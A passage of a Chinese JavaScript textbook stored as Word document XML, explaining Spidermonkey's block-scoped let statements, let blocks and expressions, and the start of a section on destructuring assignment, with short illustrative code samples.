      <w:r>
        <w:t>声明的变量在函数内都是可用的，而通过</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>声明的变量则只属于就近的花括号括起来的</w:t>
      </w:r>
      <w:r>
        <w:t>语句块（当然包括它所嵌套的语句块）。比如，如果在循环体内使用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>声明变量，那么这个变量在循环体之外是不可用的，示例代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function oddsums(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let total=0,result=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>在函数内都是有定义的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let x=1;x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=n;x++){//x</w:t>
      </w:r>
      <w:r>
        <w:t>只在循环体内有定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let odd=2*x-1;//odd</w:t>
      </w:r>
      <w:r>
        <w:t>只在循环体内有定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=odd;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>result.push(total);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里使用</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>odd</w:t>
      </w:r>
      <w:r>
        <w:t>会导致一个引用错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>oddsums(5);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,4,9,16,25]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我们注意到，在这段代码中</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>还替代了</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中的</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>。这时通过</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>创建的变量的作用域仅限于循环体、循环条件判断逻辑和自增操作表达式。同样，可以这样在</w:t>
      </w:r>
      <w:r>
        <w:t>for/i n</w:t>
      </w:r>
      <w:r>
        <w:t>（以及</w:t>
      </w:r>
      <w:r>
        <w:t>for each</w:t>
      </w:r>
      <w:r>
        <w:t>，参照</w:t>
      </w:r>
      <w:r>
        <w:t>11.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）循环中使用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o={x:1,y:2};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let p in o)console.log(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for each(let v in o)console.log(v);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(p</w:t>
      </w:r>
      <w:r>
        <w:t>)//</w:t>
      </w:r>
      <w:r>
        <w:t>引用错误：</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>没有定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在声明语句中使用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>和在循环初始化器中使用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>，两者有着有趣的区别。对于前者来说，变量初始化表达式是在变量的作用域内计算的。但对于后者来说，变量的初始化表达式则是在变量的作用域之外计算的。当出现两个变量同名的情况时需要尤为注意：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let x=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let x=x+1;x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>5;x++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(x);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个新的语句块，创建新的变量作用域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let x=x+1;//x</w:t>
      </w:r>
      <w:r>
        <w:t>没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>因此</w:t>
      </w:r>
      <w:r>
        <w:t>x+1</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(x);/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>NaN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通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>声明的变量在它们所声明的函数内始终是存在的，但直到代码执行到</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句时才初始化变量。也就是说，变量是存在的（不会抛出引用错误异常），但在</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句执行之前它的值是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。通过</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>声明变量的情况与之类似，如果在</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>语句之前使用这个变量（与</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>语句在同一个块作用域内），变量是存在的，但值是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，在用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>声明循环变量时这个问题是不存在的，语法上是不允许在初始化之前就使用这个变量的。还有一种方法可以在</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>声明语句之前使用变量时避免出</w:t>
      </w:r>
      <w:r>
        <w:t>错，就是在一条单独的</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>语句（和上文所示的</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>声明语句不同）的代码块中既包含一组变量的声明也包含这些变量的初始化表达式。语句里的变量和初始化表达式都放在一对圆括号内，随后跟随一对花括号括起来的语句块：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let x=1,y=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let(x=x+1,y=x+2){//</w:t>
      </w:r>
      <w:r>
        <w:t>注意这里的写法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(x+y);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(x+y);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>语句中的变量初始化表达式并不是这个语句块的一部分，并且是在作用域外部解析的，理解这一点至关重要。在这段代码中，我们新建了一个新的变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>并赋值给它一个更大的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的最后一种用法是</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>语句块的一个变体，其中有一对圆括号括起来的变量列表和初始化表达式，紧跟着是一个表达式而不是一个语句块。我们把这种写法叫做</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，上面的代码可以写成这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let x=1,y=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(let(x=x+1,y=x+2)x+y);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某些</w:t>
      </w:r>
      <w:r>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>的用法（不必是这里描述</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种形式）在将来很有可能被纳入</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准规范中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="11_3_Jie_Gou_Fu_Zhi_"/>
      <w:r>
        <w:t>11.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　解构赋值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Spidermonkey 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>实现了一种混合式赋值，我们称之为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>解构赋值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>destructuring assignment</w:t>
      </w:r>
      <w:r>
        <w:t>）。例如，你可能在</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Ruby</w:t>
      </w:r>
      <w:r>
        <w:t>中接触过这个概念。在解构赋值中，等号右侧是一个数组或对象（一个结构化的值），指定左侧一个或多个变量的语法和右侧的数组和对象直接量的语法保持格式一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当发生解构赋值时，右侧的数组和对象中一个或多个的值就会被提取出来（解构），并赋值给左侧相应的变量名。除了用于常</w:t>
      </w:r>
      <w:r>
        <w:t>规</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的赋值运算符之外，解构赋值还用于初始化用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>新声明的变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当和数组配合使用时解构赋值是一种写法简单但又极其强大的功能，特别是在函数返回一组结果的时候解构赋值就显得非常有用。然而当配合对象或者嵌套对象一起使用时，解构赋值变得更加复杂且容易搞混。下面的例子展示了简单的和复杂的解构赋值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里的例子是简单的解构赋值，它用到了数组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let[x,y]=[1,2];//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t>let x=1,y=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[x,y]=[x+1,y+1];//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t>x=x+1,y=y+1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[x,y]=[y,x];//</w:t>
      </w:r>
      <w:r>
        <w:t>交换两个变</w:t>
      </w:r>
      <w:r>
        <w:t>量的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log([x,y]);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>[3,2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，当函数返回一组结果时，使用解构赋值将大大简化程序代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>[x,y]</w:t>
      </w:r>
      <w:r>
        <w:t>从笛卡尔（直角）坐标转换为</w:t>
      </w:r>
      <w:r>
        <w:t>[r,theta]</w:t>
      </w:r>
      <w:r>
        <w:t>极坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function polar(x,y){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return[Math.sqrt(x*x+y*y),Math.atan2(y,x)];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将极坐标转换为笛卡尔坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function cartesian(r,theta){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return[r*Math.cos(theta),r*Math.sin(theta)];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let[r,theta]=polar(1.0,1.0);//r=Math.sqrt(2),theta=Math.PI/4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let[x,y]=cartesian(r,theta);//x=1.0,y=1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解构赋值右侧的数组所包含的元素不必和左侧的变量一一对应，左侧多余的变量的赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，而右侧多余的值则会忽略。左侧的变量列表可以包含连续的逗号用以跳过右侧对应的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let[x,y]=[1];//x=1,y=undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[x,y]=[1,2,3];//x=1,y=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[,x,,y]=[1,2,3,4];//x=2,y=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并未提供将右侧的多余的值以数组的形式赋值给左侧变量的语法。比如，在这段代码的第二行，并不能将</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3]</w:t>
      </w:r>
      <w:r>
        <w:t>赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>整个解构赋值运算的返回值是右侧的整个数据结构，而不是从中提取出来的某个值。因此，可以这样写</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>解构赋值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let first,second,all;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>all=[first,second]=[1,2,3,4];//first=1,second=2,all=[1,2,3,4]</w:t>
